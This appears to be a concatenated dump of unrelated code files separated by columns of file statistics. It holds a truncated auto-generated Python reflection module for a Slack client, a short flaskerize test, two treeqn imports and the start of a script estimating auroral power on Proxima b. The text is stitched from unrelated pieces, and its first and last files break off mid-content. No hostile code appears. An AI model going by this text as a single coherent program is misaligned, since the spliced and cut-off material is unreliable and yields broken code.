(obj).load(_cast((args)[0], lambda: slack.Client), _cast((args)[1], lambda: _JSONObject));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_event_Hello(quark.reflect.Class):
def _init(self):
quark.reflect.Class._init(self)
def __init__(self):
super(slack_event_Hello, self).__init__(u"slack.event.Hello");
(self).name = u"slack.event.Hello"
(self).parameters = _List([])
(self).fields = _List([quark.reflect.Field(u"quark.String", u"type"), quark.reflect.Field(u"slack.User", u"user"), quark.reflect.Field(u"slack.Channel", u"channel"), quark.reflect.Field(u"quark.String", u"timestamp")])
(self).methods = _List([slack_event_Hello_dispatch_Method(), slack_event_Hello_load_Method()])
(self).parents = _List([u"slack.event.SlackEvent"])
def construct(self, args):
return slack.event.Hello()
def isAbstract(self):
return False
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
slack_event_Hello.singleton = slack_event_Hello()
class slack_event_Message_load_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_event_Message_load_Method, self).__init__(u"quark.void", u"load", _List([u"slack.Client", u"quark.JSONObject"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.event.Message);
(obj).load(_cast((args)[0], lambda: slack.Client), _cast((args)[1], lambda: _JSONObject));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_event_Message_dispatch_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_event_Message_dispatch_Method, self).__init__(u"quark.void", u"dispatch", _List([u"slack.SlackHandler"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.event.Message);
(obj).dispatch(_cast((args)[0], lambda: slack.SlackHandler));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_event_Message(quark.reflect.Class):
def _init(self):
quark.reflect.Class._init(self)
def __init__(self):
super(slack_event_Message, self).__init__(u"slack.event.Message");
(self).name = u"slack.event.Message"
(self).parameters = _List([])
(self).fields = _List([quark.reflect.Field(u"quark.String", u"type"), quark.reflect.Field(u"slack.User", u"user"), quark.reflect.Field(u"slack.Channel", u"channel"), quark.reflect.Field(u"quark.String", u"timestamp"), quark.reflect.Field(u"quark.String", u"subtype"), quark.reflect.Field(u"quark.bool", u"hidden"), quark.reflect.Field(u"quark.String", u"text"), quark.reflect.Field(u"slack.event.Edited", u"edited")])
(self).methods = _List([slack_event_Message_load_Method(), slack_event_Message_dispatch_Method()])
(self).parents = _List([u"slack.event.SlackEvent"])
def construct(self, args):
return slack.event.Message()
def isAbstract(self):
return False
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
slack_event_Message.singleton = slack_event_Message()
class slack_event_Edited(quark.reflect.Class):
def _init(self):
quark.reflect.Class._init(self)
def __init__(self):
super(slack_event_Edited, self).__init__(u"slack.event.Edited");
(self).name = u"slack.event.Edited"
(self).parameters = _List([])
(self).fields = _List([quark.reflect.Field(u"slack.User", u"user"), quark.reflect.Field(u"quark.String", u"timestamp")])
(self).methods = _List([])
(self).parents = _List([u"quark.Object"])
def construct(self, args):
return slack.event.Edited()
def isAbstract(self):
return False
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
slack_event_Edited.singleton = slack_event_Edited()
class slack_SlackHandler_onSlackEvent_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_SlackHandler_onSlackEvent_Method, self).__init__(u"quark.void", u"onSlackEvent", _List([u"slack.event.SlackEvent"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.SlackHandler);
(obj).onSlackEvent(_cast((args)[0], lambda: slack.event.SlackEvent));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_SlackHandler_onHello_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_SlackHandler_onHello_Method, self).__init__(u"quark.void", u"onHello", _List([u"slack.event.Hello"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.SlackHandler);
(obj).onHello(_cast((args)[0], lambda: slack.event.Hello));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_SlackHandler_onSlackError_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_SlackHandler_onSlackError_Method, self).__init__(u"quark.void", u"onSlackError", _List([u"slack.event.SlackError"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.SlackHandler);
(obj).onSlackError(_cast((args)[0], lambda: slack.event.SlackError));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_SlackHandler_onMessage_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_SlackHandler_onMessage_Method, self).__init__(u"quark.void", u"onMessage", _List([u"slack.event.Message"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.SlackHandler);
(obj).onMessage(_cast((args)[0], lambda: slack.event.Message));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_SlackHandler(quark.reflect.Class):
def _init(self):
quark.reflect.Class._init(self)
def __init__(self):
super(slack_SlackHandler, self).__init__(u"slack.SlackHandler");
(self).name = u"slack.SlackHandler"
(self).parameters = _List([])
(self).fields = _List([])
(self).methods = _List([slack_SlackHandler_onSlackEvent_Method(), slack_SlackHandler_onHello_Method(), slack_SlackHandler_onSlackError_Method(), slack_SlackHandler_onMessage_Method()])
(self).parents = _List([u"quark.Object"])
def construct(self, args):
return None
def isAbstract(self):
return True
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
slack_SlackHandler.singleton = slack_SlackHandler()
class slack_User(quark.reflect.Class):
def _init(self):
quark.reflect.Class._init(self)
def __init__(self):
super(slack_User, self).__init__(u"slack.User");
(self).name = u"slack.User"
(self).parameters = _List([])
(self).fields = _List([quark.reflect.Field(u"slack.Client", u"client"), quark.reflect.Field(u"quark.String", u"user")])
(self).methods = _List([])
(self).parents = _List([u"quark.Object"])
def construct(self, args):
return slack.User(_cast((args)[0], lambda: slack.Client), _cast((args)[1], lambda: unicode))
def isAbstract(self):
return False
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
slack_User.singleton = slack_User()
class slack_Channel_send_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_Channel_send_Method, self).__init__(u"quark.void", u"send", _List([u"quark.String"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.Channel);
(obj).send(_cast((args)[0], lambda: unicode));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_Channel(quark.reflect.Class):
def _init(self):
quark.reflect.Class._init(self)
def __init__(self):
super(slack_Channel, self).__init__(u"slack.Channel");
(self).name = u"slack.Channel"
(self).parameters = _List([])
(self).fields = _List([quark.reflect.Field(u"slack.Client", u"client"), quark.reflect.Field(u"quark.String", u"channel")])
(self).methods = _List([slack_Channel_send_Method()])
(self).parents = _List([u"quark.Object"])
def construct(self, args):
return slack.Channel(_cast((args)[0], lambda: slack.Client), _cast((args)[1], lambda: unicode))
def isAbstract(self):
return False
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
slack_Channel.singleton = slack_Channel()
class slack_Client_connect_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_Client_connect_Method, self).__init__(u"quark.void", u"connect", _List([]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.Client);
(obj).connect();
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_Client_request_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_Client_request_Method, self).__init__(u"quark.void", u"request", _List([u"quark.String", u"quark.Map<quark.String,quark.Object>", u"quark.HTTPHandler"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.Client);
(obj).request(_cast((args)[0], lambda: unicode), _cast((args)[1], lambda: _Map), _cast((args)[2], lambda: quark.HTTPHandler));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_Client_ws_connect_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_Client_ws_connect_Method, self).__init__(u"quark.void", u"ws_connect", _List([u"quark.String"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.Client);
(obj).ws_connect(_cast((args)[0], lambda: unicode));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_Client_ws_send_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_Client_ws_send_Method, self).__init__(u"quark.void", u"ws_send", _List([u"quark.String"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.Client);
(obj).ws_send(_cast((args)[0], lambda: unicode));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_Client_onWSConnected_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_Client_onWSConnected_Method, self).__init__(u"quark.void", u"onWSConnected", _List([u"quark.WebSocket"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.Client);
(obj).onWSConnected(_cast((args)[0], lambda: quark.WebSocket));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_Client_onWSClose_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_Client_onWSClose_Method, self).__init__(u"quark.void", u"onWSClose", _List([u"quark.WebSocket"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.Client);
(obj).onWSClose(_cast((args)[0], lambda: quark.WebSocket));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_Client_onWSError_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_Client_onWSError_Method, self).__init__(u"quark.void", u"onWSError", _List([u"quark.WebSocket", u"quark.WSError"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.Client);
(obj).onWSError(_cast((args)[0], lambda: quark.WebSocket), _cast((args)[1], lambda: quark.WSError));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_Client_construct_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_Client_construct_Method, self).__init__(u"slack.event.SlackEvent", u"construct", _List([u"quark.String"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.Client);
return (obj).construct(_cast((args)[0], lambda: unicode))
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_Client_onWSMessage_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_Client_onWSMessage_Method, self).__init__(u"quark.void", u"onWSMessage", _List([u"quark.WebSocket", u"quark.String"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.Client);
(obj).onWSMessage(_cast((args)[0], lambda: quark.WebSocket), _cast((args)[1], lambda: unicode));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_Client_onHTTPResponse_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_Client_onHTTPResponse_Method, self).__init__(u"quark.void", u"onHTTPResponse", _List([u"quark.HTTPRequest", u"quark.HTTPResponse"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.Client);
(obj).onHTTPResponse(_cast((args)[0], lambda: quark.HTTPRequest), _cast((args)[1], lambda: quark.HTTPResponse));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_Client_onWSInit_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_Client_onWSInit_Method, self).__init__(u"quark.void", u"onWSInit", _List([u"quark.WebSocket"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.Client);
(obj).onWSInit(_cast((args)[0], lambda: quark.WebSocket));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_Client_onWSBinary_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_Client_onWSBinary_Method, self).__init__(u"quark.void", u"onWSBinary", _List([u"quark.WebSocket", u"quark.Buffer"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.Client);
(obj).onWSBinary(_cast((args)[0], lambda: quark.WebSocket), (args)[1]);
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_Client_onWSClosed_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_Client_onWSClosed_Method, self).__init__(u"quark.void", u"onWSClosed", _List([u"quark.WebSocket"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.Client);
(obj).onWSClosed(_cast((args)[0], lambda: quark.WebSocket));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_Client_onWSFinal_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_Client_onWSFinal_Method, self).__init__(u"quark.void", u"onWSFinal", _List([u"quark.WebSocket"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.Client);
(obj).onWSFinal(_cast((args)[0], lambda: quark.WebSocket));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_Client_onHTTPInit_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_Client_onHTTPInit_Method, self).__init__(u"quark.void", u"onHTTPInit", _List([u"quark.HTTPRequest"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.Client);
(obj).onHTTPInit(_cast((args)[0], lambda: quark.HTTPRequest));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_Client_onHTTPError_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_Client_onHTTPError_Method, self).__init__(u"quark.void", u"onHTTPError", _List([u"quark.HTTPRequest", u"quark.HTTPError"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.Client);
(obj).onHTTPError(_cast((args)[0], lambda: quark.HTTPRequest), _cast((args)[1], lambda: quark.HTTPError));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_Client_onHTTPFinal_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_Client_onHTTPFinal_Method, self).__init__(u"quark.void", u"onHTTPFinal", _List([u"quark.HTTPRequest"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.Client);
(obj).onHTTPFinal(_cast((args)[0], lambda: quark.HTTPRequest));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_Client(quark.reflect.Class):
def _init(self):
quark.reflect.Class._init(self)
def __init__(self):
super(slack_Client, self).__init__(u"slack.Client");
(self).name = u"slack.Client"
(self).parameters = _List([])
(self).fields = _List([quark.reflect.Field(u"quark.Runtime", u"runtime"), quark.reflect.Field(u"quark.String", u"token"), quark.reflect.Field(u"slack.SlackHandler", u"handler"), quark.reflect.Field(u"quark.int", u"event_id"), quark.reflect.Field(u"quark.WebSocket", u"socket")])
(self).methods = _List([slack_Client_connect_Method(), slack_Client_request_Method(), slack_Client_ws_connect_Method(), slack_Client_ws_send_Method(), slack_Client_onWSConnected_Method(), slack_Client_onWSClose_Method(), slack_Client_onWSError_Method(), slack_Client_construct_Method(), slack_Client_onWSMessage_Method(), slack_Client_onHTTPResponse_Method(), slack_Client_onWSInit_Method(), slack_Client_onWSBinary_Method(), slack_Client_onWSClosed_Method(), slack_Client_onWSFinal_Method(), slack_Client_onHTTPInit_Method(), slack_Client_onHTTPError_Method(), slack_Client_onHTTPFinal_Method()])
(self).parents = _List([u"quark.Object"])
def construct(self, args):
return slack.Client(_cast((args)[0], lambda: quark.Runtime), _cast((args)[1], lambda: unicode), _cast((args)[2], lambda: slack.SlackHandler))
def isAbstract(self):
return False
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
slack_Client.singleton = slack_Client()
class slackpack_Handler_onSlackEvent_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slackpack_Handler_onSlackEvent_Method, self).__init__(u"quark.void", u"onSlackEvent", _List([u"slack.event.SlackEvent"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slackpack.Handler);
(obj).onSlackEvent(_cast((args)[0], lambda: slack.event.SlackEvent));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slackpack_Handler_onHello_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slackpack_Handler_onHello_Method, self).__init__(u"quark.void", u"onHello", _List([u"slack.event.Hello"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slackpack.Handler);
(obj).onHello(_cast((args)[0], lambda: slack.event.Hello));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slackpack_Handler_onSlackError_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slackpack_Handler_onSlackError_Method, self).__init__(u"quark.void", u"onSlackError", _List([u"slack.event.SlackError"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slackpack.Handler);
(obj).onSlackError(_cast((args)[0], lambda: slack.event.SlackError));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slackpack_Handler_onMessage_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slackpack_Handler_onMessage_Method, self).__init__(u"quark.void", u"onMessage", _List([u"slack.event.Message"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slackpack.Handler);
(obj).onMessage(_cast((args)[0], lambda: slack.event.Message));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slackpack_Handler(quark.reflect.Class):
def _init(self):
quark.reflect.Class._init(self)
def __init__(self):
super(slackpack_Handler, self).__init__(u"slackpack.Handler");
(self).name = u"slackpack.Handler"
(self).parameters = _List([])
(self).fields = _List([])
(self).methods = _List([slackpack_Handler_onSlackEvent_Method(), slackpack_Handler_onHello_Method(), slackpack_Handler_onSlackError_Method(), slackpack_Handler_onMessage_Method()])
(self).parents = _List([u"quark.Object"])
def construct(self, args):
return slackpack.Handler()
def isAbstract(self):
return False
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
slackpack_Handler.singleton = slackpack_Handler()
class quark_Map_quark_String_quark_Object_(quark.reflect.Class):
def _init(self):
quark.reflect.Class._init(self)
def __init__(self):
super(quark_Map_quark_String_quark_Object_, self).__init__(u"quark.Map<quark.String,quark.Object>");
(self).name = u"quark.Map"
(self).parameters = _List([u"quark.String", u"quark.Object"])
(self).fields = _List([])
(self).methods = _List([])
(self).parents = _List([u"quark.Object"])
def construct(self, args):
return _Map()
def isAbstract(self):
return False
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
quark_Map_quark_String_quark_Object_.singleton = quark_Map_quark_String_quark_Object_()
class Root(_QObject):
def _init(self):
pass
def __init__(self): self._init()
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
Root.slack_event_SlackEvent_md = slack_event_SlackEvent.singleton
Root.slack_event_SlackError_md = slack_event_SlackError.singleton
Root.slack_event_Hello_md = slack_event_Hello.singleton
Root.slack_event_Message_md = slack_event_Message.singleton
Root.slack_event_Edited_md = slack_event_Edited.singleton
Root.slack_SlackHandler_md = slack_SlackHandler.singleton
Root.slack_User_md = slack_User.singleton
Root.slack_Channel_md = slack_Channel.singleton
Root.slack_Client_md = slack_Client.singleton
Root.slackpack_Handler_md = slackpack_Handler.singleton
Root.quark_Map_quark_String_quark_Object__md = quark_Map_quark_String_quark_Object_.singleton
def _lazy_import_slack_event():
import slack.event
globals().update(locals())
_lazyImport("import slack.event", _lazy_import_slack_event)
def _lazy_import_slack():
import slack
globals().update(locals())
_lazyImport("import slack", _lazy_import_slack)
def _lazy_import_quark():
import quark
globals().update(locals())
_lazyImport("import quark", _lazy_import_quark)
def _lazy_import_slackpack():
import slackpack
globals().update(locals())
_lazyImport("import slackpack", _lazy_import_slackpack)
_lazyImport.pump("slackpack_md.slack_event_SlackEvent_load_Method")
| 32.768943
| 605
| 0.669683
| 4,367
| 35,030
| 5.062972
| 0.026792
| 0.04957
| 0.045771
| 0.043691
| 0.851379
| 0.814337
| 0.791
| 0.761465
| 0.75052
| 0.744821
| 0
| 0.001816
| 0.198144
| 35,030
| 1,068
| 606
| 32.799625
| 0.785325
| 0
| 0
| 0.756997
| 0
| 0
| 0.07642
| 0.012275
| 0
| 0
| 0
| 0
| 0
| 1
| 0.368957
| false
| 0.059796
| 0.026718
| 0.145038
| 0.642494
| 0.001272
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
|
0
| 10
|
ebf7877309b313ad57806c703de5bf1c98197d7f
| 320
|
py
|
Python
|
flaskerize/custom_functions_test.py
|
ehoeffner/flaskerize
|
cb887a80ae0a2c06f61cf941e029fd7174fdd233
|
[
"BSD-3-Clause"
] | 119
|
2019-05-07T00:48:58.000Z
|
2022-03-30T07:17:53.000Z
|
flaskerize/custom_functions_test.py
|
darkguinito/myflaskerize
|
e76e3e4b6c91e2859b974aabf82e0ea5539bcf1b
|
[
"BSD-3-Clause"
] | 36
|
2019-04-28T11:14:56.000Z
|
2022-03-28T16:09:21.000Z
|
flaskerize/custom_functions_test.py
|
darkguinito/myflaskerize
|
e76e3e4b6c91e2859b974aabf82e0ea5539bcf1b
|
[
"BSD-3-Clause"
] | 15
|
2019-08-29T17:38:28.000Z
|
2021-04-29T02:27:59.000Z
|
from flaskerize import register_custom_function, registered_funcs
def test_register_custom_function():
def f1():
return 1
@register_custom_function
def f2():
return 42
assert len(registered_funcs) == 1
assert registered_funcs[0]() == f2()
assert registered_funcs[0]() != f1()
| 21.333333
| 65
| 0.678125
| 39
| 320
| 5.282051
| 0.461538
| 0.291262
| 0.320388
| 0.242718
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.040323
| 0.225
| 320
| 14
| 66
| 22.857143
| 0.790323
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.3
| 1
| 0.3
| true
| 0
| 0.1
| 0.2
| 0.6
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
00175dafaa2dbf1b0be80d959b14c15463ce25c4
| 94
|
py
|
Python
|
treeqn/utils/bl_common/__init__.py
|
chinnadhurai/treeqn
|
f230ad51731cccec00671b951882a2a2d0cc11e4
|
[
"MIT"
] | 107
|
2018-03-09T14:28:21.000Z
|
2022-03-23T08:24:48.000Z
|
treeqn/utils/bl_common/__init__.py
|
chinnadhurai/treeqn
|
f230ad51731cccec00671b951882a2a2d0cc11e4
|
[
"MIT"
] | 3
|
2018-05-01T16:31:41.000Z
|
2018-10-04T15:57:41.000Z
|
treeqn/utils/bl_common/__init__.py
|
chinnadhurai/treeqn
|
f230ad51731cccec00671b951882a2a2d0cc11e4
|
[
"MIT"
] | 22
|
2018-03-09T23:17:27.000Z
|
2020-12-11T20:53:05.000Z
|
from treeqn.utils.bl_common.math_util import *
from treeqn.utils.bl_common.misc_util import *
| 31.333333
| 46
| 0.829787
| 16
| 94
| 4.625
| 0.5625
| 0.27027
| 0.405405
| 0.459459
| 0.621622
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085106
| 94
| 2
| 47
| 47
| 0.860465
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
004697482942dad4b22eb7a23fb4b8f2c3a5ce88
| 16,524
|
py
|
Python
|
signal/power_m2.py
|
rodluger/exoaurora
|
0ec1c59c368ccbf0c9eb2450d52b7ec7897ce322
|
[
"MIT"
] | 1
|
2021-01-18T04:23:34.000Z
|
2021-01-18T04:23:34.000Z
|
signal/power_m2.py
|
rodluger/exoaurora
|
0ec1c59c368ccbf0c9eb2450d52b7ec7897ce322
|
[
"MIT"
] | null | null | null |
signal/power_m2.py
|
rodluger/exoaurora
|
0ec1c59c368ccbf0c9eb2450d52b7ec7897ce322
|
[
"MIT"
] | 2
|
2021-01-18T04:23:38.000Z
|
2022-03-06T11:03:53.000Z
|
# -*- coding: utf-8 -*-
"""
this script computes the expected auroral power output for the
oi 5577 angstrom line for proxima b, given stellar wind conditions
for planet 'b' from cohen et al 2014
@author: mtilley [matt a. tilley, university of washington]
@email: mtilley (at) uw (dot) edu
"""
# imports
from __future__ import print_function, division
import numpy as np
from numpy import linalg as la
import scipy as sp
import scipy.constants as spcon
import auroral_signal as asig
'''
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
relevant parameters
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
'''
# wind parameters include relative motion of planet
# sub-alfvenic stellar wind
nsub = 433. # [cm^-3]
vsub = [-630.,-48.3,30.] # [km s^-1]
bsub = [-804.,-173.,63.] # [nt]
tsub = 3.42 # [10^5 k]
# super-alfvenic stellar wind
nsup = 12895. # [cm^-3]
vsup = [-202.,54.7,22.] # [km s^-1]
bsup = [-57.,-223.,92.] # [nt]
tsup = 4.77 # [10^5 k]
# cme scaling using wang et al formula
# and nominal increases in density, velocity, and imf [arb]
cme_scale = 10**0.24 * 3.**1.47 * 15**0.86
# energy per photon [j photon^-1]
e_5577 = spcon.h*spcon.c/5.577e-7
e_1041 = spcon.h*spcon.c/1.041e-7
# electron fraction of auroral precip -- hubert 2002 [arb]
e_frac = 0.8
# steele & mcewen conversion efficiency [photons (erg cm^-2 s^-1)^-1]
oi_eff = 1.48e9
# Mauk 1994 converstion efficiency for UV band [photons (erg cm^-2 s^-1)^-1]
uv_eff = 5.e9
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
'''
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
power estimations
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
'''
# power estimated at earth
print( '\n-=-=-=-=-=-=-=-=-=-=-' )
print( '\n\tearth\n' )
print( '-=-=-=-=-=-=-=-=-=-=-\n' )
# magnetopause distance
dist = asig.mpause_dist()
print( ' estimated sub-stellar magnetopause distance: %.3e' % dist + ' m\n' )
# auroral oval
oval = asig.auroral_oval()*1.e4
print( ' estimated auroral oval area: %.3e' % oval + ' cm^2\n' )
print( ' estimated auroral energetic particle power delivered to auroral regions:\n' )
# quiet magnetosphere
power_out_q = asig.power_calc()
print( ' quiet\t\t-\t%.3e' % power_out_q + ' w' )
# stormy magnetosphere
power_out_s = asig.power_calc( theta=spcon.pi )
print( ' substorm\t-\t%.3e' % power_out_s + ' w' )
# cme wind conditions
power_out_c = asig.power_calc()*cme_scale
print( ' cme\t\t-\t%.3e' % power_out_c + ' w' )
# cme wind conditions + stormy magnetosphere
power_out_cs = asig.power_calc( theta=spcon.pi )*cme_scale
print( ' cme+substorm\t-\t%.3e' % power_out_cs + ' w' )
print( '\n estimated auroral power for the oi 5577 a line:\n' )
